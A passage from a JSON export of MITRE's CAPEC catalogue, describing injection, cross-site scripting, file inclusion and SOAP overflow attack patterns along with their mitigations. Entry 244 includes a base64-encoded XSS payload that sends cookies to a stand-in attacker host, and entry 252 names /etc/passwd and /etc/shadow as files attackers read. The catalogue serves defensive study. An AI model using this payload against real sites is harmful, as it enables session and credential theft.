Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description, Execution_Flow, Prerequisites, Related_Attack_Patterns"}],"Previous_Entry_Name":["Calling Signed Code From Another Language Within A Sandbox Allow This",{"Date":"2018-07-31"},"Escaping a Sandbox by Calling Signed Code in Another Language",{"Date":"2020-12-17"}]}},"240":{"ID":"240","Name":"Resource Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Ensure all input content that is delivered to client is sanitized against an acceptable content specification.","Perform input validation for all content.","Enforce regular patching of software."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"99"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Resource Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"242":{"ID":"242","Name":"Code Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad."}},"Mitigations":{"Mitigation":["Utilize strict type, character, and encoding enforcement","Ensure all input content that is delivered to client is sanitized against an acceptable content specification.","Perform input validation for all content.","Enforce regular patching of software."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"94"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Code Injection"}},"References":{"Reference":{"External_Reference_ID":"REF-612","Section":"Testing for Code Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"243":{"ID":"243","Name":"XSS Targeting HTML Attributes","Abstraction":"Detailed","Status":"Draft","Description":"An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":"The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands."},"Resources_Required":{"Resource":"The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and use an allowlist for all input including that which is not expected to have any scripting content.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"83"}},"References":{"Reference":{"External_Reference_ID":"REF-94"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Cross-Site Scripting in Attributes",{"Date":"2017-05-01"},"XSS Targetting HTML Attributes",{"Date":"2018-07-31"}]}},"244":{"ID":"244","Name":"XSS Targeting URI Placeholders","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits the ability of most browsers to interpret \\"data\\", \\"javascript\\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt injection payload variations on input parameters] Possibly using an automated tool, an attacker requests variations on the inputs they surveyed before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.","Technique":["Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme."},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to send HTTP request to a web application"},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.","Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":{"p":["The following payload data:","represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.","The decoded payload is the following piece of HTML code:","Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.","An attacker could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):","Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack."],"div":["text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==",{"style":"margin-left:10px;","class":"informative"},"<html>",{"style":"margin-left:10px;","class":"informative","div":["<body>",{"style":"margin-left:10px;","div":["<script>",{"style":"margin-left:10px;","div":["var img = new Image();",{"style":"margin-left:10px;"}]}]}]},"<a href=\\"INJECTION_POINT\\">My Link</a>",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"83"}},"References":{"Reference":[{"External_Reference_ID":"REF-70","Section":"Testing for Cross site scripting"},{"External_Reference_ID":"REF-96"},{"External_Reference_ID":"REF-97","Section":"XSS Filter Evasion Cheat Sheet"},{"External_Reference_ID":"REF-72","Section":"WASC-08 - Cross Site Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Cross-Site Scripting via Encoded URI Schemes",{"Date":"2017-05-01"}]}},"245":{"ID":"245","Name":"XSS Using Doubled Characters","Abstraction":"Detailed","Status":"Draft","Description":"The attacker bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<<script or %3C%3script using URI encoding) the filters of some web applications may fail to recognize the presence of a script tag. If the targeted server is vulnerable to this type of bypass, the attacker can create a crafted URL or other trap to cause a victim to view a page on the targeted server where the malicious content is executed, as per a normal XSS attack.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":"The targeted web application does not fully normalize input before checking for prohibited syntax. In particular, it must fail to recognize prohibited methods preceded by certain sequences of repeated characters."},"Resources_Required":{"Resource":"The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and sanitize all user supplied fields.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"85"}},"References":{"Reference":{"External_Reference_ID":"REF-99"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},"Previous_Entry_Name":["Cross-Site Scripting Using Doubled Characters, e.g. %3C%3Cscript",{"Date":"2017-05-01"}]}},"247":{"ID":"247","Name":"XSS Using Invalid Characters","Abstraction":"Detailed","Status":"Draft","Description":"An adversary inserts invalid characters in identifiers to bypass application filtering of input. Filters may not scan beyond invalid characters but during later stages of processing content that follows these invalid characters may still be processed. This allows the attacker to sneak prohibited commands past filters and perform normally prohibited operations. Invalid characters may include null, carriage return, line feed or tab in an identifier. Successful bypassing of the filter can result in a XSS attack, resulting in the disclosure of web cookies or possibly other results.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":"The target must fail to remove invalid characters from input and fail to adequately scan beyond these characters."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and use an allowlist for any input that will be included in any subsequent web pages or back end operations.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"86"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Cross-Site Scripting with Masking through Invalid Characters in Identifiers",{"Date":"2017-05-01"}]}},"248":{"ID":"248","Name":"Command Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary looking to execute a command of their choosing, injects new items into an existing command thus modifying interpretation away from what was intended. Commands in this context are often standalone strings that are interpreted by a downstream component and cause specific responses. This type of attack is possible when untrusted values are used to build these command strings. Weaknesses in input validation or command construction can enable the attack and lead to successful exploitation.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target application must accept input from the user and then use this input in the construction of commands to be executed. In virtually all cases, this is some form of string input that is concatenated to a constant string defined by the application to form the full command to be executed."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data."}},"Mitigations":{"Mitigation":["All user-controllable input should be validated and filtered for potentially unwanted characters. Using an allowlist for input is desired, but if use of a denylist approach is necessary, then focusing on command related terms and delimiters is necessary.","Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.","Input should be parameterized, or restricted to data sections of a command, thus removing the chance that the input will be treated as part of the command itself."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"77"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Command Injection"}},"References":{"Reference":{"External_Reference_ID":"REF-615","Section":"Testing for Command Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Description Summary, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"250":{"ID":"250","Name":"XML Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker utilizes crafted XML user-controllable input to probe, attack, and inject data into the XML database, using techniques similar to SQL injection. The user-controllable input can allow for unauthorized viewing of data, bypassing authentication or the front-end application for direct XML database access, and possibly altering database information.","Likelihood_Of_Attack":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey Application]","Technique":["Spider web sites for all available links.","Gather results for analysis via responses or network sniffing."]},{"Step":"2","Phase":"Experiment","Description":"[Test user-controllable inputs for injection]","Technique":"Use XML reserved characters or words, possibly with other input data to attempt to cause unexpected results"}]},"Prerequisites":{"Prerequisite":["XML queries used to process user input and retrieve information stored in XML documents","User-controllable input not properly sanitized"]},"Skills_Required":{"Skill":["An attacker must have knowledge of XML syntax and constructs in order to successfully leverage XML Injection",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"Too many exceptions generated by the application as a result of malformed queries"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XML data or a query.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application."]},"Example_Instances":{"Example":"Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"91"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"23","Entry_Name":"XML Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"251":{"ID":"251","Name":"Local Code Inclusion","Abstraction":"Standard","Status":"Stable","Description":"The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"175"}},"Prerequisites":{"Prerequisite":["The targeted application must have a bug that allows an adversary to control which code file is loaded at some juncture.","Some variants of this attack may require that old versions of some code files be present and in predictable locations."]},"Resources_Required":{"Resource":"The adversary needs to have enough access to the target application to control the identity of a locally included file. The attacker may also need to be able to upload arbitrary code files to the target machine, although any location for these files may be acceptable."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"Through local code inclusion, the adversary compromises the integrity of the application."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"An attacker may leverage local code inclusion in order to print sensitive data to a page, such as hidden configuration files or or password hashes."}]},"Mitigations":{"Mitigation":"Implementation: Avoid passing user input to filesystem or framework API. If necessary to do so, implement a specific, allowlist approach."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1055","Entry_Name":"Process Injection"}},"References":{"Reference":{"External_Reference_ID":"REF-613","Section":"Testing for Local File Inclusion"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"252":{"ID":"252","Name":"PHP Local File Inclusion","Abstraction":"Detailed","Status":"Draft","Description":"The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"251"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find. The adversary is looking for URLs that show PHP file inclusion is used, which can look something like \\"http://vulnerable-website/file.php?file=index.php\\".","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt variations on input parameters] Once the adversary finds a vulnerable URL that takes file input, they attempt a variety of path traversal techniques to attempt to get the application to display the contents of a local file, or execute a different PHP file already stored locally on the server.","Technique":["Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of path traversal techniques used to include well known files.","Use a proxy tool to record results of manual input of local file inclusion probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Include desired local file] Once the adversary has determined which techniques of path traversal successfully work with the vulnerable PHP application, they will target a specific local file to include. These can be files such as \\"/etc/passwd\\", \\"/etc/shadow\\", or configuration files for the application that might expose sensitive information."}]},"Prerequisites":{"Prerequisite":"The targeted PHP application must have a bug that allows an attacker to control which code file is loaded at some juncture."},"Resources_Required":{"Resource":"The attacker needs to have enough access to the target application to control the identity of a locally included PHP file."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"References":{"Reference":{"External_Reference_ID":"REF-621","Section":"PHP File Inclusion"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"253":{"ID":"253","Name":"Remote Code Inclusion","Abstraction":"Standard","Status":"Draft","Description":"The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"175"},{"Nature":"CanPrecede","CAPEC_ID":"664"}]},"Prerequisites":{"Prerequisite":"Target application server must allow remote files to be included.The malicious file must be placed on the remote machine previously."},"Mitigations":{"Mitigation":"Minimize attacks by input validation and sanitization of any user data that will be used by the target application to locate a remote file to be included."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"05","Entry_Name":"Remote File Inclusion"}},"References":{"Reference":{"External_Reference_ID":"REF-614","Section":"Testing for Remote File Inclusion"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"256":{"ID":"256","Name":"SOAP Array Overflow","Abstraction":"Detailed","Status":"Draft","Description":"An attacker sends a SOAP request with an array whose actual length exceeds the length indicated in the request. If the server processing the transmission naively trusts the specified size, then an attacker can intentionally understate the size of the array, possibly resulting in a buffer overflow if the server attempts to read the entire data set into the memory it allocated for a smaller array.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application to perform the buffer overflow on. In this attack, adversaries look for applications that utilize SOAP as a communication mechanism."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"The adversary creates a SOAP message that incorrectly specifies the size of its array to be smaller than the size of the actual content by a large margin and sends it to the application. If this causes a crash or some unintended behavior, it is likely that this is a valid injection vector."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs","The adversary will choose a SOAP type that allows them to put shellcode into the buffer when the array is read into the application."]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary sends the crafted 